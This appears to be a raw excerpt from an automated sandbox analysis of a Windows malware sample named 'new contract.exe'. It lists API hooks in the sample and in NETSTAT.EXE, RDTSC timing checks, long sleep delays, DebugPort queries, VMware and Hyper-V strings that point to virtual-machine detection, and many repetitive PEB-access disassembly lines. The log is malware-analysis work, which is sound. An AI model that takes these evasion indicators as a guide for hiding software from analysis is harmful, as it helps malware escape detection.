          Source: C:\Users\user\Desktop\new contract.exe | API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\new contract.exe | API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\new contract.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\new contract.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\new contract.exe | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\new contract.exe | RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 519904 second address: 51990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 519B6E second address: 519B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\new contract.exe | Memory allocated: 1490000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\new contract.exe | Memory allocated: 2F50000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\new contract.exe | Memory allocated: 4F50000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\new contract.exe | Memory allocated: 9030000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\new contract.exe | Memory allocated: A030000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\new contract.exe | Memory allocated: A230000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\new contract.exe | Memory allocated: B230000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\new contract.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 6573
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 3365
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 888
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 859
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Window / User API: threadDelayed 5994
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Window / User API: threadDelayed 3978
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_3-13938)
          Source: C:\Users\user\Desktop\new contract.exe | API coverage: 1.7 %
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | API coverage: 2.0 %
          Source: C:\Users\user\Desktop\new contract.exe TID: 7444 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 8076 | Thread sleep count: 6573 > 30
          Source: C:\Windows\explorer.exe TID: 8076 | Thread sleep time: -13146000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 8076 | Thread sleep count: 3365 > 30
          Source: C:\Windows\explorer.exe TID: 8076 | Thread sleep time: -6730000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 | Thread sleep count: 5994 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 | Thread sleep time: -11988000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 | Thread sleep count: 3978 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 | Thread sleep time: -7956000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
          Source: C:\Users\user\Desktop\new contract.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.1754990382.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000003.00000000.1754990382.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.4138853699.000000000997A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.4138853699.000000000997A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000002.4133315277.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000003.00000002.4137532531.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\new contract.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\new contract.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0040ACE0 LdrLoadDll
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016F4164 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016B4144 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016B8158 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01626154 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0161C156 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01650124 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016CA118 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016CA118 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E0115 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016F61E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016501F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E61C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0169E1D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01660185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016DC188 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016C4180 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016A019F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0161A197 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0164C073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01622050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016A6050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0161A020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0161C020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016B6030 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016A4000 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h]2_2_0163E016
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h]2_2_0163E016
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h]2_2_0163E016
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h]2_2_0163E016
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0161A0E3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A60E0 mov eax, dword ptr fs:[00000030h]2_2_016A60E0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016280E9 mov eax, dword ptr fs:[00000030h]2_2_016280E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161C0F0 mov eax, dword ptr fs:[00000030h]2_2_0161C0F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016620F0 mov ecx, dword ptr fs:[00000030h]2_2_016620F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A20DE mov eax, dword ptr fs:[00000030h]2_2_016A20DE
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016180A0 mov eax, dword ptr fs:[00000030h]2_2_016180A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B80A8 mov eax, dword ptr fs:[00000030h]2_2_016B80A8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E60B8 mov eax, dword ptr fs:[00000030h]2_2_016E60B8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E60B8 mov ecx, dword ptr fs:[00000030h]2_2_016E60B8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162208A mov eax, dword ptr fs:[00000030h]2_2_0162208A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C437C mov eax, dword ptr fs:[00000030h]2_2_016C437C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F634F mov eax, dword ptr fs:[00000030h]2_2_016F634F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov ecx, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EA352 mov eax, dword ptr fs:[00000030h]2_2_016EA352
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C8350 mov ecx, dword ptr fs:[00000030h]2_2_016C8350
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h]2_2_016F8324
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F8324 mov ecx, dword ptr fs:[00000030h]2_2_016F8324
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h]2_2_016F8324
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h]2_2_016F8324
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h]2_2_0165A30B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h]2_2_0165A30B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h]2_2_0165A30B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161C310 mov ecx, dword ptr fs:[00000030h]2_2_0161C310
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01640310 mov ecx, dword ptr fs:[00000030h]2_2_01640310
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h]2_2_0163E3F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h]2_2_0163E3F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h]2_2_0163E3F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016563FF mov eax, dword ptr fs:[00000030h]2_2_016563FF
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DC3CD mov eax, dword ptr fs:[00000030h]2_2_016DC3CD
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h]2_2_016283C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h]2_2_016283C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h]2_2_016283C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h]2_2_016283C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A63C0 mov eax, dword ptr fs:[00000030h]2_2_016A63C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h]2_2_016CE3DB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h]2_2_016CE3DB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE3DB mov ecx, dword ptr fs:[00000030h]2_2_016CE3DB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h]2_2_016CE3DB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C43D4 mov eax, dword ptr fs:[00000030h]2_2_016C43D4
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C43D4 mov eax, dword ptr fs:[00000030h]2_2_016C43D4
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h]2_2_0161E388
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h]2_2_0161E388
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h]2_2_0161E388
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164438F mov eax, dword ptr fs:[00000030h]2_2_0164438F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164438F mov eax, dword ptr fs:[00000030h]2_2_0164438F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618397 mov eax, dword ptr fs:[00000030h]2_2_01618397
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618397 mov eax, dword ptr fs:[00000030h]2_2_01618397
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618397 mov eax, dword ptr fs:[00000030h]2_2_01618397
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624260 mov eax, dword ptr fs:[00000030h]2_2_01624260
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624260 mov eax, dword ptr fs:[00000030h]2_2_01624260
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624260 mov eax, dword ptr fs:[00000030h]2_2_01624260
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161826B mov eax, dword ptr fs:[00000030h]2_2_0161826B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A8243 mov eax, dword ptr fs:[00000030h]2_2_016A8243
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A8243 mov ecx, dword ptr fs:[00000030h]2_2_016A8243
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161A250 mov eax, dword ptr fs:[00000030h]2_2_0161A250
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F625D mov eax, dword ptr fs:[00000030h]2_2_016F625D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626259 mov eax, dword ptr fs:[00000030h]2_2_01626259
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DA250 mov eax, dword ptr fs:[00000030h]2_2_016DA250
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DA250 mov eax, dword ptr fs:[00000030h]2_2_016DA250
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161823B mov eax, dword ptr fs:[00000030h]2_2_0161823B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h]2_2_016302E1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h]2_2_016302E1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h]2_2_016302E1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F62D6 mov eax, dword ptr fs:[00000030h]2_2_016F62D6
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302A0 mov eax, dword ptr fs:[00000030h]2_2_016302A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302A0 mov eax, dword ptr fs:[00000030h]2_2_016302A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov ecx, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
